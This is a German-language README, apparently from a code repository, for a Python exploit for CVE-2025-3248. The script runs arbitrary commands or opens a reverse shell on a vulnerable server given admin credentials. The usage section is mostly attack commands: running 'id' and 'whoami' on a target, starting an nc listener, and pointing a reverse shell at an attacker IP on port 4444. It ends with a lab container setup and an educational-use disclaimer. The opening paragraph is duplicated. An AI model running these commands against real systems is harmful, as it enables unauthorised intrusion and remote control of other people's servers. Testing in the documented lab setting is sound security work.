
Dieses Python-Skript nutzt CVE-2025-3248 aus, um beliebige Befehle auszuführen oder eine Reverse-Shell auf einem verwundbaren System zu starten. Für die Verwendung dieses Exploits ist eine Authentifizierung erforderlich.
Dieses Python-Skript nutzt CVE-2025-3248 aus, um beliebige Befehle auszuführen oder eine Reverse Shell auf einem verwundbaren System zu starten. Für die Nutzung dieses Exploits ist eine Authentifizierung erforderlich.
requests-BibliothekInstallieren Sie die Abhängigkeiten mit:
pip install requests
python3 exploit.py -u <TARGET_URL> -l <USERNAME> -p <PASSWORD> [-c <COMMAND>] [--proxy <PROXY>] [--lhost <LHOST> --lport <LPORT>]
| Argument | Beschreibung | Erforderlich |
|---|---|---|
-u, --url | Basis-URL des Ziels (z. B. https://target.com) | Ja |
-l, --login | Admin-Benutzername | Ja |
-p, --password | Admin-Passwort | Ja |
-c, --command | Befehl, der auf dem Ziel ausgeführt werden soll | Nein* |
--proxy | Proxy-URL (z. B. http://127.0.0.1:8080) | Nein |
--lhost | Lokaler Host für die Reverse Shell | Nein* |
--lport | Lokaler Port für die Reverse Shell | Nein* |
* Sie müssen entweder einen Befehl (-c) oder sowohl --lhost als auch --lport für eine Reverse Shell angeben.
python3 exploit.py -u https://target.com -l admin -p password -c "id"
Starten Sie einen Listener auf Ihrem Rechner:
nc -lvnp 4444
Führen Sie dann aus:
python3 exploit.py -u https://target.com -l admin -p password --lhost YOUR_IP --lport 4444
python3 exploit.py -u https://target.com -l admin -p password -c "whoami" --proxy http://127.0.0.1:8080
Sie können das Docker-Image mit dem folgenden Befehl bereitstellen:
podman compose up -d
Das Image ist unter http://localhost:7860 verfügbar.
Credits für die Compose-Datei: Dieses Repository
Dieses Skript dient nur zu Bildungs- und autorisierten Penetrationstest-Zwecken. Verwenden Sie es nicht gegen Systeme, die Ihnen nicht gehören oder für die Sie keine ausdrückliche Testgenehmigung haben.
Diese README wurde von KI generiert.